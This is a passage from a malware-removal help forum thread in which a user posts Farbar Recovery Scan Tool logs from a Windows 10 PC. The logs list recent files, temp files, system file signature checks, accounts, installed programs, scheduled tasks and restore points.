2015-12-10 14:40 - 2015-07-30 13:52 - 00000006 ____H C:\WINDOWS\Tasks\SA.DAT
2015-12-10 14:39 - 2015-09-10 20:56 - 00065536 _____ C:\WINDOWS\system32\spu_storage.bin
2015-12-10 14:39 - 2015-07-10 01:05 - 00524288 ___SH C:\WINDOWS\system32\config\BBI
2015-12-10 14:36 - 2015-07-30 14:42 - 00000000 ____D C:\WINDOWS\system32\oobe
2015-12-10 14:34 - 2015-07-30 13:49 - 04824408 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2015-12-10 06:08 - 2015-10-29 11:43 - 00004166 _____ C:\WINDOWS\System32\Tasks\User_Feed_Synchronization-{1E320142-1459-4672-B122-13DC235259CC}
2015-12-10 06:08 - 2013-07-24 20:26 - 00000000 ____D C:\Users\PimpSlap\AppData\Local\Adobe
2015-12-09 17:47 - 2015-07-22 00:56 - 00000000 ____D C:\Users\PimpSlap\AppData\Roaming\.minecraft
2015-12-09 17:47 - 2015-03-08 19:11 - 00000000 ____D C:\ProgramData\Origin
2015-12-09 15:19 - 2015-07-30 14:25 - 00000000 ____D C:\WINDOWS\CbsTemp
2015-12-09 15:18 - 2014-11-26 14:56 - 00000000 ____D C:\WINDOWS\system32\MRT
2015-12-09 15:07 - 2013-04-11 21:40 - 140158008 _____ (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2015-12-09 12:05 - 2015-07-17 15:21 - 00000000 ____D C:\Users\PimpSlap\AppData\Roaming\uTorrent
2015-12-09 11:19 - 2015-07-30 14:42 - 00000000 ____D C:\WINDOWS\system32\NDF
2015-12-09 11:07 - 2015-10-29 12:49 - 00000000 ____D C:\Users\PimpSlap\Desktop\Youtube Videos
2015-12-09 09:25 - 2015-10-28 15:51 - 00000000 ____D C:\Users\PimpSlap\AppData\Local\CrashDumps
2015-12-08 19:39 - 2013-04-11 19:27 - 00301728 ____N (Microsoft Corporation) C:\WINDOWS\system32\MpSigStub.exe
2015-12-08 16:50 - 2013-04-12 10:17 - 00000000 ____D C:\Users\PimpSlap\AppData\Roaming\vlc
2015-12-08 16:18 - 2015-03-23 21:33 - 00000000 ____D C:\Users\PimpSlap\Desktop\Extra Stuff
2015-12-07 20:00 - 2014-11-22 11:04 - 00214392 _____ C:\WINDOWS\SysWOW64\PnkBstrB.exe
2015-12-07 20:00 - 2014-11-22 11:04 - 00214392 _____ C:\WINDOWS\SysWOW64\PnkBstrB.ex0
2015-12-06 16:43 - 2015-10-29 12:52 - 00000000 ____D C:\Users\PimpSlap\Desktop\Game Shortcuts
2015-12-06 16:16 - 2015-10-11 14:24 - 00000000 ___DC C:\WINDOWS\Panther
2015-12-06 16:12 - 2015-10-30 01:42 - 00000000 ___HD C:\$WINDOWS.~BT
2015-12-06 13:17 - 2015-07-27 22:42 - 28314777 _____ C:\BirthdayHangar.zip
2015-12-05 23:28 - 2015-07-14 18:11 - 00000000 ____D C:\Users\PimpSlap\AppData\Local\by_dimabal100000
2015-12-05 13:42 - 2015-04-16 14:53 - 00000000 ____D C:\Users\PimpSlap\Documents\Movies
2015-12-04 18:48 - 2013-04-11 20:56 - 00000000 ____D C:\ProgramData\Symantec
2015-12-04 15:38 - 2015-10-31 12:23 - 00000000 ____D C:\Users\PimpSlap\AppData\Local\MicrosoftEdge
2015-12-03 15:20 - 2015-10-30 15:15 - 00004018 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineUA1d11368d9c6141c
2015-12-03 15:20 - 2015-10-30 15:15 - 00003786 _____ C:\WINDOWS\System32\Tasks\GoogleUpdateTaskMachineCore1d11368d9784eb7
2015-12-02 08:50 - 2015-05-22 19:19 - 00000000 ____D C:\Users\PimpSlap\Documents\From The Depths
2015-12-01 16:29 - 2015-08-10 23:34 - 00000000 ____D C:\Program Files (x86)\Origin
2015-11-30 16:32 - 2015-07-30 14:43 - 00826872 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerApp.exe
2015-11-30 16:32 - 2015-07-30 14:43 - 00176632 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerCPLApp.cpl
2015-11-27 17:08 - 2015-10-29 12:55 - 00000000 ____D C:\Users\PimpSlap\Desktop\Notes
2015-11-25 15:00 - 2013-05-03 14:02 - 00000000 ____D C:\Users\PimpSlap\AppData\Local\ElevatedDiagnostics
2015-11-22 18:23 - 2015-07-14 18:10 - 49969431 _____ C:\Gnomefathers.zip
2015-11-14 19:28 - 2015-07-30 14:42 - 00000000 ____D C:\WINDOWS\rescache
2015-11-14 09:47 - 2015-04-29 14:08 - 00000000 ____D C:\Users\PimpSlap\AppData\Local\Steam
2015-11-12 19:30 - 2015-03-24 14:35 - 00000000 ____D C:\Users\PimpSlap\Documents\My Games
2015-11-12 18:50 - 2015-02-01 20:57 - 00000000 ____D C:\Games
2015-11-12 12:32 - 2015-02-13 22:47 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\R.G. Mechanics
2015-11-11 13:54 - 2015-05-04 20:23 - 00000000 ____D C:\Users\PimpSlap\Documents\BeamNG.drive
2015-11-11 12:56 - 2015-07-15 19:42 - 00000000 ____D C:\Users\PimpSlap\AppData\Local\Smellyriver
2015-11-11 03:31 - 2015-07-30 14:42 - 00000000 ____D C:\WINDOWS\system32\appraiser
2015-11-10 16:39 - 2015-05-03 18:17 - 00000080 _____ C:\Users\PimpSlap\AppData\Local剜捯獫慴⁲慇敭屳呇⁁屖湥楴汴浥湥⹴湩潦
 
==================== Files in the root of some directories =======
 
2015-08-11 00:35 - 2015-11-01 11:14 - 0002564 _____ () C:\Users\PimpSlap\AppData\Roaming\Bubble Dock.boostrap.log
2015-08-11 00:35 - 2015-11-01 11:14 - 0011460 _____ () C:\Users\PimpSlap\AppData\Roaming\Bubble Dock.installation.log
2015-11-11 16:42 - 2015-11-11 16:42 - 0000161 _____ () C:\Users\PimpSlap\AppData\Roaming\Camdata.ini
2015-11-11 16:42 - 2015-11-11 16:42 - 0000408 _____ () C:\Users\PimpSlap\AppData\Roaming\CamLayout.ini
2015-11-11 16:42 - 2015-11-11 16:42 - 0000408 _____ () C:\Users\PimpSlap\AppData\Roaming\CamShapes.ini
2015-11-11 16:42 - 2015-11-11 16:42 - 0004563 _____ () C:\Users\PimpSlap\AppData\Roaming\CamStudio.cfg
2015-07-29 18:40 - 2015-07-30 00:10 - 0000115 _____ () C:\Users\PimpSlap\AppData\Roaming\LogFile.txt
2015-08-13 18:53 - 2015-09-11 14:51 - 0028250 _____ () C:\Users\PimpSlap\AppData\Roaming\net.telestream.wirecast.xml
2015-08-11 00:36 - 2015-11-01 11:14 - 0000156 _____ () C:\Users\PimpSlap\AppData\Roaming\Selection Tools.installation.log
2015-07-10 22:36 - 2015-07-10 22:38 - 0008704 ___SH () C:\Users\PimpSlap\AppData\Roaming\Thumbs.db
2014-11-22 20:06 - 2014-11-22 20:07 - 0033134 _____ () C:\Users\PimpSlap\AppData\Roaming\UserTile.png
2015-08-11 00:35 - 2015-11-01 11:14 - 0000194 _____ () C:\Users\PimpSlap\AppData\Roaming\WindApp.boostrap.log
2015-08-11 00:35 - 2015-11-01 11:14 - 0000156 _____ () C:\Users\PimpSlap\AppData\Roaming\WindApp.installation.log
2015-03-26 19:01 - 2015-12-10 17:23 - 0007608 _____ () C:\Users\PimpSlap\AppData\Local\resmon.resmoncfg
2015-10-11 13:27 - 2015-10-11 13:27 - 0000000 ____H () C:\ProgramData\DP45977C.lfl
2015-09-13 17:17 - 2015-07-15 17:17 - 0000032 ____R () C:\ProgramData\hash.dat
 
Files to move or delete:
====================
C:\Program Files (x86)\Razer\Comms\RazerComms.exe
C:\ProgramData\hash.dat
 
 
Some files in TEMP:
====================
C:\Users\PimpSlap\AppData\Local\Temp\BingSvc.exe
C:\Users\PimpSlap\AppData\Local\Temp\BSvcProcessor.exe
C:\Users\PimpSlap\AppData\Local\Temp\BSvcUpdater.exe
C:\Users\PimpSlap\AppData\Local\Temp\drm_dyndata_7380014.dll
C:\Users\PimpSlap\AppData\Local\Temp\Itibiti_Knctr_C.exe
C:\Users\PimpSlap\AppData\Local\Temp\raptrpatch.exe
C:\Users\PimpSlap\AppData\Local\Temp\raptr_stub.exe
C:\Users\PimpSlap\AppData\Local\Temp\Skin.dll
C:\Users\PimpSlap\AppData\Local\Temp\Social%20Club%20v1.1.6.8%20Setup.exe
C:\Users\PimpSlap\AppData\Local\Temp\vcredist_x64.exe
 
 
==================== Bamital & volsnap =================
 
(There is no automatic fix for files that do not pass verification.)
 
C:\WINDOWS\system32\winlogon.exe => File is digitally signed
C:\WINDOWS\system32\wininit.exe => File is digitally signed
C:\WINDOWS\explorer.exe => File is digitally signed
C:\WINDOWS\SysWOW64\explorer.exe => File is digitally signed
C:\WINDOWS\system32\svchost.exe => File is digitally signed
C:\WINDOWS\SysWOW64\svchost.exe => File is digitally signed
C:\WINDOWS\system32\services.exe => File is digitally signed
C:\WINDOWS\system32\User32.dll => File is digitally signed
C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed
C:\WINDOWS\system32\userinit.exe => File is digitally signed
C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed
C:\WINDOWS\system32\rpcss.dll => File is digitally signed
C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
C:\WINDOWS\SysWOW64\dnsapi.dll => File is digitally signed
C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed
 
 
LastRegBack: 2015-11-30 18:23
 
==================== End of FRST.txt ============================


#4
jake1master

  • Topic Starter
  • Member
  • 10 posts

Additional scan result of Farbar Recovery Scan Tool (x64) Version:09-12-2015
Ran by PimpSlap (2015-12-10 17:28:52)
Running from C:\Users\PimpSlap\Desktop
Windows 10 Pro (X64) (2015-10-12 00:19:09)
Boot Mode: Normal
==========================================================
 
 
==================== Accounts: =============================
 
Administrator (S-1-5-21-1710800545-2821560886-2955275411-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-1710800545-2821560886-2955275411-503 - Limited - Disabled)
Guest (S-1-5-21-1710800545-2821560886-2955275411-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-1710800545-2821560886-2955275411-1008 - Limited - Enabled)
PimpSlap (S-1-5-21-1710800545-2821560886-2955275411-1000 - Administrator - Enabled) => C:\Users\PimpSlap
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
 
==================== Installed Programs ======================
 
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
µTorrent (HKU\S-1-5-21-1710800545-2821560886-2955275411-1000\...\uTorrent) (Version: 3.4.5.41372 - BitTorrent Inc.)
A.V.A - Alliance of Valiant Arms (HKLM-x32\...\Steam App 102700) (Version:  - RED DUCK Inc.)
ACP Application (Version: 2015.1012.1326.42 - Advanced Micro Devices, Inc.) Hidden
Action! (HKLM-x32\...\Mirillis Action!) (Version: 1.29.0 - Mirillis)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 3.1.0.4880 - Adobe Systems Incorporated)
Adobe Flash Player 18 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 18.0.0.232 - Adobe Systems Incorporated)
Adobe Flash Professional CS5.5 (HKLM-x32\...\{23E445D5-FD83-4C50-A211-EB26A2975317}) (Version: 11.5 - Adobe Systems Incorporated)
Adobe Help Manager (HKLM-x32\...\chc.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1) (Version: 4.0.244 - Adobe Systems Incorporated)
Adobe Illustrator CS6 (HKLM-x32\...\{4869414E-7AEA-4C8E-BE1C-8D40977FD517}) (Version: 16.0 - Adobe Systems Incorporated)
Adobe Photoshop CS6 (HKLM-x32\...\{74EB3499-8B95-4B5C-96EB-7B342F3FD0C6}) (Version: 13.0 - Adobe Systems Incorporated)
Alien Swarm (HKLM-x32\...\Steam App 630) (Version:  - Valve)
AMD Catalyst Control Center (HKLM-x32\...\WUCCCApp) (Version: 1.00.0000 - AMD)
AMD Catalyst Install Manager (HKLM\...\{AAFD93A0-6522-9FF4-69CF-15B98681681A}) (Version: 8.0.916.0 - Advanced Micro Devices, Inc.)
APB Reloaded (HKLM-x32\...\Steam App 113400) (Version:  - Reloaded Productions)
Armored Warfare MyCom Beta (HKU\S-1-5-21-1710800545-2821560886-2955275411-1000\...\Armored Warfare MyCom Beta) (Version: 1.48 - My.com B.V.)
ASIO4ALL (HKLM-x32\...\ASIO4ALL) (Version: 2.11 Beta2 - Michael Tippach)
Audacity 2.1.1 (HKLM-x32\...\Audacity®_is1) (Version: 2.1.1 - Audacity Team)
Awesomenauts (HKLM-x32\...\Steam App 204300) (Version:  - Ronimo Games)
Battlefield 4™ (HKLM-x32\...\{ABADE36E-EC37-413B-8179-B432AD3FACE7}) (Version: 1.6.2.40658 - Electronic Arts)
BeamNG.drive (HKLM-x32\...\Steam App 284160) (Version:  - BeamNG)
Blender (HKLM\...\{EA3C8A99-1565-44FF-89FC-926CEEB623B5}) (Version: 2.75.1 - Blender Foundation)
Block N Load (HKLM-x32\...\Steam App 299360) (Version:  - Jagex)
Burstfire (HKLM-x32\...\Steam App 349580) (Version:  - Nacho Games)
Canon MX340 series MP Drivers (HKLM\...\{1199FAD5-9546-44f3-81CF-FFDB8040B7BF}_Canon_MX340_series) (Version:  - )
CDisplayEx 1.10.29 (HKLM\...\CDisplayEx_is1) (Version:  - Progdigy Software S.A.R.L.)
Celemony Melodyne version 2.1 (HKLM\...\Celemony Melodyne_is1) (Version:  - Copyright © 2001-2012 Celemony Software GmbH)
Chivalry: Medieval Warfare (HKLM-x32\...\Steam App 219640) (Version:  - Torn Banner Studios)
Cities Skylines (HKLM-x32\...\Cities Skylines_is1) (Version: 1.0 - Релиз от R.G. Steamgames)
Counter-Strike: Global Offensive (HKLM-x32\...\Steam App 730) (Version:  - Valve)
D3DX10 (x32 Version: 15.4.2368.0902 - Microsoft) Hidden
DAEMON Tools Lite (HKLM-x32\...\DAEMON Tools Lite) (Version: 4.49.1.0356 - Disc Soft Ltd)
Dead Island Riptide (HKLM-x32\...\Steam App 216250) (Version:  - Techland)
Fallout 4 (HKLM-x32\...\Fallout 4_is1) (Version:  - )
FileZilla Client 3.13.1 (HKU\S-1-5-21-1710800545-2821560886-2955275411-1000\...\FileZilla Client) (Version: 3.13.1 - Tim Kosse)
FL Studio 11 (HKLM-x32\...\FL Studio 11) (Version:  - Image-Line)
FL Studio 12 (HKLM-x32\...\FL Studio 12) (Version:  - Image-Line)
FlowStone FL 3.0 (HKLM-x32\...\FlowStone) (Version:  - )
Fraps (remove only) (HKLM-x32\...\Fraps) (Version:  - )
From The Depths (HKLM-x32\...\Steam App 268650) (Version:  - Brilliant Skies Ltd.)
Frozen Synapse (HKLM-x32\...\Steam App 98200) (Version:  - Mode 7)
Garry's Mod (HKLM-x32\...\Steam App 4000) (Version:  - Facepunch Studios)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 47.0.2526.80 - Google Inc.)
Google Update Helper (x32 Version: 1.3.29.1 - Google Inc.) Hidden
Grand Theft Auto IV (HKLM-x32\...\Steam App 12210) (Version:  - Rockstar North)
Grand Theft Auto IV (x32 Version: 1.0.0013.131 - Rockstar Games Inc.) Hidden
Grand Theft Auto V (HKLM-x32\...\Grand Theft Auto V_R.G. Mechanics_is1) (Version:  - R.G. Mechanics, ProZorg_tm)
Grand Theft Auto V v.1.0.350.1 (HKLM-x32\...\Grand Theft Auto V_is1) (Version:  - )
Guns of Icarus Online (HKLM-x32\...\Steam App 209080) (Version:  - Muse Games)
Heroes & Generals (HKLM-x32\...\Steam App 227940) (Version:  - Reto-Moto)
HWiNFO64 Version 5.06 (HKLM\...\HWiNFO64_is1) (Version: 5.06 - Martin Malík - REALiX)
IL Shared Libraries (HKLM-x32\...\IL Shared Libraries) (Version:  - Image-Line)
Intel® C++ Redistributables on Intel® 64 (HKLM-x32\...\{AA67D612-0BE5-44D6-9A91-592958F754A1}) (Version: 13.0.198 - Intel Corporation)
Itibiti RTC (x32 Version: 0.0.1 - Itibiti Inc) Hidden
Java 8 Update 25 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F86418025F0}) (Version: 8.0.250 - Oracle Corporation)
Java 8 Update 25 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218025F0}) (Version: 8.0.250 - Oracle Corporation)
Just Cause 2 (HKLM-x32\...\Steam App 8190) (Version:  - Avalanche Studios)
Just Cause 2: Multiplayer Mod (HKLM-x32\...\Steam App 259080) (Version:  - Avalanche Studios)
Kerbal Space Program (HKLM-x32\...\Steam App 220200) (Version:  - Squad)
League of Legends (HKLM-x32\...\League of Legends 3.0.1) (Version: 3.0.1 - Riot Games)
League of Legends (x32 Version: 3.0.1 - Riot Games) Hidden
Macrium Reflect Free Edition (HKLM\...\MacriumReflect) (Version: 6.0 - Paramount Software (UK) Ltd.)
Macrium Reflect Free Edition (Version: 6.0.753 - Paramount Software (UK) Ltd.) Hidden
Magical Jelly Bean KeyFinder (HKLM-x32\...\KeyFinder_is1) (Version: 2.0.10.10 - Magical Jelly Bean)
Microsoft Games for Windows - LIVE (HKLM-x32\...\{2C9EE786-1DDB-4C98-8FA4-B1B9B5A66B77}) (Version: 3.1.186.0 - Microsoft Corporation)
Microsoft Games for Windows - LIVE Redistributable (HKLM-x32\...\{42AA4CA8-DCD8-4308-BCAB-0B6D75856A9D}) (Version: 3.5.95.0 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{837b34e3-7c30-493c-8f6a-2b0f04e2912c}) (Version: 8.0.59193 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010 Redistributable - x64 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010 Redistributable - x86 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{a2199617-3609-410f-a8e8-e8806c73545b}) (Version: 11.0.61030.0 - Корпорация Майкрософт)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{f0080ca2-80ae-4958-b6eb-e8fa916d744a}) (Version: 11.0.61030.0 - Корпорация Майкрософт)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Xbox 360 Accessories 1.2 (HKLM\...\{D9C50188-12D5-4D3E-8F00-682346C2AA5F}) (Version: 1.20.146.0 - Microsoft)
Microsoft XNA Framework Redistributable 4.0 (HKLM-x32\...\{2BFC7AA0-544C-4E3A-8796-67F3BE655BE9}) (Version: 4.0.20823.0 - Microsoft Corporation)
Movie Maker (x32 Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
Mozilla Firefox 22.0 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 22.0 (x86 en-US)) (Version: 22.0 - Mozilla)
Mozilla Maintenance Service (HKLM-x32\...\MozillaMaintenanceService) (Version: 22.0 - Mozilla)
MSI Afterburner 4.1.1 (HKLM-x32\...\Afterburner) (Version: 4.1.1 - MSI Co., LTD)
My.com Game Center (HKU\S-1-5-21-1710800545-2821560886-2955275411-1000\...\MyComGames) (Version: 3.142 - My.com B.V.)
Next Car Game: Wreckfest (HKLM-x32\...\Steam App 228380) (Version:  - Bugbear)
Nidhogg (HKLM-x32\...\Steam App 94400) (Version:  - Messhof)
NVIDIA PhysX (HKLM-x32\...\{8B922CF8-8A6C-41CE-A858-F1755D7F5D29}) (Version: 9.12.1031 - NVIDIA Corporation)
Open Broadcaster Software (HKLM-x32\...\Open Broadcaster Software) (Version:  - )
OpenAL (HKLM-x32\...\OpenAL) (Version:  - )
Origin (HKLM-x32\...\Origin) (Version: 9.7.2.53208 - Electronic Arts, Inc.)
paint.net (HKLM\...\{DF3A46D9-67B3-44B2-9D01-25C8BA772C8A}) (Version: 4.0.6 - dotPDN LLC)
PDF Settings CS6 (x32 Version: 11.0 - Adobe Systems Incorporated) Hidden
PlanetSide 2 (HKLM-x32\...\Steam App 218230) (Version:  - Daybreak Games)
PlanetSide 2 (HKU\S-1-5-21-1710800545-2821560886-2955275411-1000\...\DG0-PlanetSide 2) (Version:  - Sony Online Entertainment)
PlanetSide 2 (HKU\S-1-5-21-1710800545-2821560886-2955275411-1000\...\SOE-PlanetSide 2) (Version:  - Sony Online Entertainment)
PunkBuster Services (HKLM-x32\...\PunkBusterSvc) (Version: 0.993 - Even Balance, Inc.)
Rainbow Six Siege - Closed Beta (HKLM-x32\...\Uplay Install 1001) (Version:  - Ubisoft)
Raptr (HKLM-x32\...\Raptr) (Version:  - )
Rapture3D 2.4.8 Game (HKLM-x32\...\{D2FCA41E-AC01-4DCD-B3A7-DC9E32363065}}_is1) (Version:  - Blue Ripple Sound)
Razer Comms (HKLM-x32\...\Razer Comms) (Version: 5.12 - Razer Inc.)
Razer Cortex (HKLM-x32\...\Razer Cortex_is1) (Version: 6.0.29.0 - Razer Inc.)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7541 - Realtek Semiconductor Corp.)
Red Faction: Guerrilla Steam Edition (HKLM-x32\...\Steam App 20500) (Version:  - Volition)
Renesas Electronics USB 3.0 Host Controller Driver (HKLM-x32\...\InstallShield_{5442DAB8-7177-49E1-8B22-09A049EA5996}) (Version: 2.1.28.0 - Renesas Electronics Corporation)
Renesas Electronics USB 3.0 Host Controller Driver (x32 Version: 2.1.28.0 - Renesas Electronics Corporation) Hidden
RivaTuner Statistics Server 6.2.0 (HKLM-x32\...\RTSS) (Version: 6.2.0 - Unwinder)
ROBLOX Player (HKLM-x32\...\{373B1718-8CC5-4567-8EE2-9033AD08A680}) (Version:  - ROBLOX Corporation)
Robocraft (HKLM-x32\...\Steam App 301520) (Version:  - Freejam)
Rockstar Games Social Club (HKLM-x32\...\Rockstar Games Social Club) (Version: 1.1.5.8 - Rockstar Games)
Silent Hunter 5: Battle of the Atlantic (HKLM-x32\...\Steam App 48110) (Version:  - Ubisoft Entertainment)
Silent Hunter III (HKLM-x32\...\Steam App 15210) (Version:  - Ubisoft)
Silent Hunter: Wolves of the Pacific (HKLM-x32\...\Steam App 15200) (Version:  - Ubisoft Romania)
Skype™ 7.12 (HKLM-x32\...\{6A0549A9-1B96-498C-ACBC-3943001FEB19}) (Version: 7.12.101 - Skype Technologies S.A.)
SlimDrivers (HKLM-x32\...\{5AD12E7A-D739-4451-9BD1-3610EC56D8F5}) (Version: 2.2.45206 - SlimWare Utilities, Inc.)
Source Filmmaker (HKLM-x32\...\Steam App 1840) (Version:  - Valve)
Space Engineers (HKLM-x32\...\Steam App 244850) (Version:  - Keen Software House)
Spiral Knights (HKLM-x32\...\Steam App 99900) (Version:  - Three Rings)
Super Monday Night Combat (HKLM-x32\...\Steam App 104700) (Version:  - Uber Entertainment)
Team Fortress 2 (HKLM-x32\...\Steam App 440) (Version:  - Valve)
TeamSpeak 3 Client (HKU\S-1-5-21-1710800545-2821560886-2955275411-1000\...\TeamSpeak 3 Client) (Version: 3.0.16 - TeamSpeak Systems GmbH)
Toribash (HKLM-x32\...\Steam App 248570) (Version:  - Nabi Studios)
Uplay (HKLM-x32\...\Uplay) (Version: 10.0 - Ubisoft)
UserTesting.com Recorder Plugin (HKU\S-1-5-21-1710800545-2821560886-2955275411-1000\...\UserTestingPlugin) (Version:  - UserTesting.com)
Vegas Pro 13.0 (64-bit) (HKLM\...\{1EEE0BEE-0BC8-11E5-A19E-F04DA23A5C58}) (Version: 13.0.453 - Sony)
VLC media player 2.0.5 (HKLM\...\VLC media player) (Version: 2.0.5 - VideoLAN)
War Thunder Launcher 1.0.1.538 (HKLM-x32\...\{ed8deea4-29fa-3932-9612-e2122d8a62d9}}_is1) (Version:  - Gaijin Entertainment)
Wargame: AirLand Battle (HKLM-x32\...\Steam App 222750) (Version:  - Eugen Systems)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3528.0331 - Microsoft Corporation)
Wirecast (HKLM\...\{C6719F5F-B77C-4BA2-AD0C-8273A26B4B2F}) (Version: 6.0.5 - Telestream LLC)
World of Tanks - Common Test (HKU\S-1-5-21-1710800545-2821560886-2955275411-1000\...\{1EAC1D02-C6AC-4FA6-9A44-96258C37C812ct}_is1) (Version:  - Wargaming.net)
World of Tanks (HKU\S-1-5-21-1710800545-2821560886-2955275411-1000\...\{1EAC1D02-C6AC-4FA6-9A44-96258C37C812na}_is1) (Version:  - Wargaming.net)
World of Warships (HKU\S-1-5-21-1710800545-2821560886-2955275411-1000\...\{1EAC1D02-C6AC-4FA6-9A44-96258C37C814na}_is1) (Version:  - Wargaming.net)
 
==================== Custom CLSID (Whitelisted): ==========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
CustomCLSID: HKU\S-1-5-21-1710800545-2821560886-2955275411-1000_Classes\CLSID\{5F63E8CB-8F57-490A-97FE-62BC2F2A5EA4}\InprocServer32 -> no filepath
CustomCLSID: HKU\S-1-5-21-1710800545-2821560886-2955275411-1000_Classes\CLSID\{71DCE5D6-4B57-496B-AC21-CD5B54EB93FD}\localserver32 -> C:\Users\PimpSlap\AppData\Local\Microsoft\OneDrive\17.3.6201.1019\FileCoAuth.exe (Microsoft Corporation)
CustomCLSID: HKU\S-1-5-21-1710800545-2821560886-2955275411-1000_Classes\CLSID\{A416C15B-A073-4994-8DB5-87527A41B2FA}\localserver32 -> C:\Program Files\Telestream\Wirecast\Wirecast.exe (Telestream LLC)
 
==================== Restore Points =========================
 
04-12-2015 22:44:39 Removed Symantec Endpoint Protection.
09-12-2015 15:03:32 Windows Update
09-12-2015 15:04:52 Windows Update
 
==================== Hosts content: ===============================
 
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
 
2015-07-30 14:42 - 2015-07-30 14:39 - 00000824 ____A C:\WINDOWS\system32\Drivers\etc\hosts
 
 
==================== Scheduled Tasks (Whitelisted) =============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
Task: {081ABC0D-24F4-40EA-B6DE-B1C9DA4DB0B0} - System32\Tasks\Microsoft\Windows\Media Center\OCURDiscovery => C:\Windows\ehome\ehPrivJob.exe
Task: {092BE97C-3C33-4A5D-B930-632C4755578B} - System32\Tasks\Microsoft\Windows\Media Center\DispatchRecoveryTasks => C:\Windows\ehome\ehPrivJob.exe
Task: {092DC215-D0D3-4EF3-8D68-760C15460A3F} - System32\Tasks\Microsoft\Windows\Media Center\PeriodicScanRetry => C:\Windows\ehome\MCUpdate.exe
Task: {1EB42D90-5242-4322-8923-B36B9A2E19CE} - System32\Tasks\Microsoft\Windows\Media Center\StartRecording => C:\Windows\ehome\ehrec.exe
